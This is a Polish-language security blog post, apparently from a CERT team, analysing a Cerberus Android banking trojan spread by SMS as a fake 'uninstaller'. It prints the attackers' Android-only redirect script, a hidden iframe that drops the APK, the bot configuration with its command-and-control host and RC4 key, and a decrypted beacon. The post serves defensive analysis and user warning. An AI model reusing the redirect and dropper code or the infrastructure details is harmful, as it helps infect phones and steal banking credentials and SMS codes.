hamburger

(jeśli zgłaszasz przypadek phishingu, zapisz mail (przesuń go z programu pocztowego na pulpit komputera lub wybierz opcję plik/zapisz jako), a następnie załącz)

Podejrzany SMS prześlij na nr 508 700 900

Jeśli zgłoszenie dotyczy bezpieczeństwa dzieci, zgłoś je również pod http://www.dyzurnet.pl
@CERT_OPL

Banker Cerberus pod szyldem „deinstalatora”

Zgodnie z wczorajszą obietnicą wracamy do analizy złośliwego oprogramowania, rozpowszechniającego się przez SMS od nadawcy „WrozbySMS”, z „deinstalatorem” nieistniejącej aplikacji. Użytkownik, przekonany socjotechnicznie, że zainstalował sobie aplikację, korzystanie z której miałoby go kosztować 30 złotych (skoro mowa o subskrypcji to zapewne miesięcznie).

Zaczyna się od SMSa z nadpisu Wrozby SMS, zawierającego link z  URL hxxp://wrozbyonline.net/wrozby, „po drodze” przekierowujący na stronę w domenie .pl. W kodzie strony, odpowiedzialnym za przekierowanie, widać, że złośliwa aktywność podejmowana jest wyłącznie w przypadku stwierdzenia, iż ofiara otwiera link na telefonie z systemem Android.

<script type=”text/javascript”>
var isMobile = {
        Android: function() {
            return navigator.userAgent.match(/Android/i);
        },
        BlackBerry: function() {
            return navigator.userAgent.match(/BlackBerry/i);
        },
        iOS: function() {
            return navigator.userAgent.match(/iPhone|iPad|iPod/i);
        },
        Opera: function() {
            return navigator.userAgent.match(/Opera Mini/i);
        },
        Windows: function() {
            return navigator.userAgent.match(/IEMobile/i);
        },
        any: function() {
            return (isMobile.Android() || isMobile.BlackBerry() || isMobile.iOS() || isMobile.Opera() || isMobile.Windows());
        }
    };

 
if ( isMobile.Android() ) {  
document.location.href=”download.html”;
}else{
document.location.href=”https://www.wrozbyonline.pl„;
}
</script>

 

Ostateczne przekierowanie następuje na stronę wrozbyonline.net/download.html

<iframe width=”1″ height=”1″ frameborder=”0″ src=”sklepjubilerski.apk”></iframe>

Skąd finalnie pobierana jest złośliwa aplikacja:

hxxp://wrozbyonline.net/sklepjubilerski.apk

Aby zainstalować aplikację należy w opcjach telefonu zezwolić na instalację z nieznanych źródeł. Aplikacje spoza sklepu Play nie instalują się automatycznie (wymagają zmiany ustawień przez użytkownika)

W momencie analizy wirus rozpoznawalny był przez siedem silników antywirusów pod różnymi nazwami.

  • AhnLab-V3 Trojan/Android.Banker.896466
  • Avast-Mobile Android:Evo-gen [Trj]
  • Avira (no cloud) ANDROID/Dropper.FRGT.Gen
  • CAT-QuickHeal Android.Agent.GEN32502
  • DrWeb Android.BankBot.2311
  • F-Secure Malware.ANDROID/Dropper.FRGT.Gen
  • Fortinet Android/Agent.DVL!tr
  • Ikarus Trojan-Banker.AndroidOS.Cerberus
  • K7GW Trojan ( 0055e1561 )
  • Kaspersky HEUR:Trojan-Dropper.AndroidOS.Hqwar.bp
  • ZoneAlarm by Check Point HEUR:Trojan-Dropper.AndroidOS.Hqwar.bp

Z samych uprawnień pliku APK wygląda, iż jego funkcjonalność polega na kradzieży  SMS’ów przychodzących na zainfekowany telefon, co wynika z uprawnień, zawartych w pliku AndroidManifest.xml:

  • odczyt kontaktów
  • wykonywanie połączeń
  • dostęp do internetu
  • wskaźnik baterii
  • wysyłanie wiadomości SMS
  • odczyt SMS
  • odczyt informacji o stanie urządzenia (dane sieci, numer telefonu, status połączeń)

Aplikacja instaluje się jak zwykła aplikacja na Androida. Bez wątpienia czerwoną lampkę u użytkownika powinien zapalić fakt, iż jako „deinstalator” instalujemy aplikację… Sklep Jubilerski.

Co więcej, po zainstalowaniu aplikacji otwiera się okno z monitem proszącym o włączenie rzekomej „Ochrony Telefonu” (przypominamy, iż aplikacja nosi nazwę Sklep Jubilerski!). Przestępcy chcą przekonać ofiarę, iż jest to niezbędne, by aplikacja w pełni działała na telefonie, a tak naprawdę umożliwia to wirusowi uzyskanie dalszych, znacznie szerszych uprawnień niezbędnych do efektywnego działania.

 

 

Oczywiście aplikację znajdziemy również w systemowym menedżerze aplikacji.

Dalsza analiza wykazuje iż mamy do czynienia z Cerberusem – bardzo popularnym tzw. bankerem na smartfony, służącym do wykradania haseł dostępowych, loginów do aplikacji bankowych i SMSów autoryzacyjnych. Robi to głównie za pomocą nakładek (ang. overlay) przysłaniających ekran i podszywających się pod bank. Kod do wstrzyknięcia nakładki pobierany jest z zewnętrznego serwera, podczas gdy wirus jest uruchomiony na zainfekowanym telefonie. Złośliwe oprogramowanie w kodzie posiada funkcjonalność dynamicznie ładujących się modułów.

Poniżej została przestawiona konfiguracja wraz z widocznym kluczem RC4, służącym do szyfrowania i odszyfrowania przesyłanych danych między zainfekowanym telefonem a serwerem Command&Control:

<?xml version=’1.0′ encoding=’utf-8′ standalone=’yes’ ?>
<map>
    <int name=”lastVersionCodeUsed” value=”2357121″ />
</map>
<?xml version=’1.0′ encoding=’utf-8′ standalone=’yes’ ?>
<map>
    <string name=”idbot”>a4jd56tj3fbx58211</string>
    <string name=”lockDevice”>0</string>
    <string name=”timeMails”>-1</string>
    <string name=”timeWorking”>1096</string>
    <string name=”statCards”>0</string>
   <string name=”urlAdminPanel”>http://curcaoes.club</string>
    <string name=”LogSMS”>BLOCK DISABLE ACCESIBILITY SERVICE::endLog::</string>
    <string name=”activeDevice”>0</string>
    <string name=”nameInject”></string>
    <string name=”packageNameDefultSmsMenager”>com.android.mms</string>
    <string name=”activityAccessibilityVisible”>1</string>
    <string name=”urls”></string>
    <string name=”autoClick”>1</string>
    <string name=”old_start_inj”>0</string>
    <string name=”app_inject”></string>
    <string name=”timestop”>0</string>
    <string name=”goOffProtect”></string>
    <string name=”display_width”>1080</string>
    <string name=”logsContacts”></string>
    <string name=”packageNameActivityInject”>qujfnblzgcdjxqsmnua.biitilrludzi.ascxgxmtwcfaksdqtgzypd.indvy.opxvzpqjw</string>
    <string name=”actionSettingInection”></string>
    <string name=”statDownloadModule”>0</string>
    <string name=”arrayInjection”></string>
    <string name=”offSound”>0</string>
    <string name=”timeProtect”>-1</string>
    <string name=”listSaveLogsInjection”></string>
    <string name=”activeInjection”>0</string>
    <string name=”statAccessibilty”>1</string>
    <string name=”killApplication”></string>
    <string name=”timeInject”>-1</string>
    <string name=”checkupdateInjection”></string>
    <string name=”whileStartUpdateInection”></string>
    <string name=”getIdentifier”>1234567890</string>
    <string name=”packageName”>lhsp.zcbyngoqjpbbzpq.hqbcbmtz</string>
    <string name=”initialization”>good</string>
    <string name=”day1PermissionSMS”>1</string>
    <string name=”startpush”></string>
    <string name=”keylogger”></string>
    <string name=”checkProtect”>2</string>
    <string name=”starterService”></string>
    <string name=”schetAdmin”>90</string>
    <string name=”getPermissionsToSMS”></string>
    <string name=”dataKeylogger”></string>
    <string name=”statusInstall”></string>
    <string name=”inj_start”>0</string>
    <string name=”statMails”>0</string>
    <string name=”logsSavedSMS”></string>
    <string name=”idSettings”></string>
    <string name=”schetBootReceiver”>90</string>
    <string name=”step”>0</string>
    <string name=”statBanks”>0</string>
    <string name=”statProtect”>0</string>
    <string name=”hiddenSMS”></string>
    <string name=”logsApplications”></string>
    <string name=”key”>sfhdfhwerkhgjfgh</string>
    <string name=”timeCC”>-1</string>
    <string name=”display_height”>1920</string>
    <string name=”statAdmin”>0</string>
    <string name=”startInstalledTeamViewer”>1</string>
    <string name=”kill”></string>
</map>

Jak wskazuje kod, malware pozwala atakującemu nie tylko na podglądanie smsów, ale także danych logowania do banków, treści maili i wiele więcej. W trakcie analizy uruchomiono w środowisku odizolowanym komunikację telefonu z C&C pod adresem curcaoes.club. Poniższy proces przedstawia odszywfowanie przesyłanych danych.

Przykładowa zaszyfrowana komunikacja po wcześniejszym zdekodowaniu base64:

619afaf2c4d6eafc61d88b329376bb31b03deb18bf9cc351da42b7f5b177a76f76d057
19645a25ee2a852aa7e969c92da15a5ae84ab35217b4cd7e4e8067ae9dc5f15cc89
4030938842806b343c34f92dec141b2cc6586c50a060cbc82a23ca23d0409921393
7566d33fe3f183c4b709f763e491c3425c2aac18c8fea1e0e02563b7db4f090a58327
69b026dba0d7c17d400a2536e7c0a66b7b8b3a8ddbcd4ddac19a252430d59c634e
2380be395039c7af066acda0d8e4f0c31fbb3b14e572322f17fc3c0aadfd4d6e5b871
22453a162cf3a4a94e41f53bf71a89947ce19f7c99af952c04d2188f7ada32770fcab0
c4070fe3a5a6d31751a74c027ed90ed2ad024867fe5ca83cf63d1cba40788fe6fa950
000a7c2

Po zdekodowaniu przy użyciu klucza RC4 „sfhdfhwerkhgjfgh” ciąg wygląda tak:

7B 22 69 64 22 3A 22 67 70 69 62 38 6D 64 69 34 63 61 73 75 37 68 76 68 22 2C 22 69 64 53 65 74 74 69 6E 67 73 22 3A 22 22 2C 22 73 74 61 74 41 64 6D 69 6E 22 3A 22 30 22 2C 22 73 74 61 74 50 72 6F 74 65 63 74 22 3A 22 32 22 2C 22 73 74 61 74 53 63 72 65 65 6E 22 3A 22 31 22 2C 22 73 74 61 74 41 63 63 65 73 73 69 62 69 6C 74 79 22 3A 22 31 22 2C 22 73 74 61 74 53 4D 53 22 3A 22 30 22 2C 22 73 74 61 74 43 61 72 64 73 22 3A 22 30 22 2C 22 73 74 61 74 42 61 6E 6B 73 22 3A 22 30 22 2C 22 73 74 61 74 4D 61 69 6C 73 22 3A 22 30 22 2C 22 61 63 74 69 76 65 44 65 76 69 63 65 22 3A 22 30 22 2C 22 74 69 6D 65 57 6F 72 6B 69 6E 67 22 3A 22 31 32 30 22 2C 22 73 74 61 74 44 6F 77 6E 6C 6F 61 64 4D 6F 64 75 6C 65 22 3A 22 30 22 2C 22 62 61 74 74 65 72 79 4C 65 76 65 6C 22 3A 22 31 30 30 22 2C 22 6C 6F 63 61 6C 65 22 3A 22 70 6C 22 7D

Ostatecznie odszyfrowany wynik końcowy transmisji do C&C wygląda tak:

{„id”:”gpib8mdi3casu7hvh”,”idSettings”:””,”statAdmin”:”0″,”statProtect”:”2″,”statScreen”:”1″,
„statAccessibilty”:”1″,”statSMS”:”0″,”statCards”:”0″,”statBanks”:”0″,”statMails”:”0″,
„activeDevice”:”0″,”timeWorking”:”120″,”statDownloadModule”:”0″,”batteryLevel”:”100″,
„locale”:”pl”}

Co robić?

Akurat w opisywanym przypadku wystarczy zdrowy rozsądek – po pierwsze pod Androidem nie ma konieczności „instalancji deinstalatora”, poza tym – jak wspominaliśmy wyżej – ostatecznym szlabanem przed instalacją tego typu aplikacji powinna być nazwa, „Sklep Jubilerski”. W przypadku lepiej przygotowanego phishingu, warto pamiętać o jednej, najistotniejszej zasadzie – instalacja czegokolwiek spoza oficjalnych sklepów to proszenie się o problemy.

Nie dajcie się okraść.


Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Zobacz także

Komunikat dotyczący plików cookies

Ta witryna używa plików cookies (małych plików tekstowych, przechowywanych na Twoim urządzeniu). Są one stosowane dla zapewnienia prawidłowego działania strony oraz do zbierania informacji o Twoich preferencjach i nawykach użytkowania witryny.

Pliki cookies niezbędne do działania strony używamy do zapewnienia podstawowych funkcji, takich jak logowanie oraz zapewnienie bezpieczeństwa witrynie. Ich wykorzystanie nie wymaga Twojej zgody.

Pliki cookies funkcyjne. Pozwalają nam zbierać informacje na temat zalogowanych sesji oraz przechowywać dane wpisane przez Ciebie w formularzach znajdujących się na stronie takich jak: czas trwania zalogowanej sesji , nazwę użytkownika.

Pozostałe kategorie wykorzystywania plików cookies, które wymagają Twojej zgody na używanie

Pliki cookies statystyczne/analityczne. Pozwalają nam zbierać anonimowe informacje o ruchu na stronie (liczba odwiedzin, źródło ruchu i czas spędzony na witrynie). Te dane pomagają nam zrozumieć, jak nasi użytkownicy korzystają z witryny i poprawiają jej działanie.

Możesz zmienić swoje preferencje dotyczące plików cookies w każdej chwili. W celu zarządzania plikami cookies lub wycofania zgody na ich używanie, prosimy skorzystać z ustawień przeglądarki internetowej.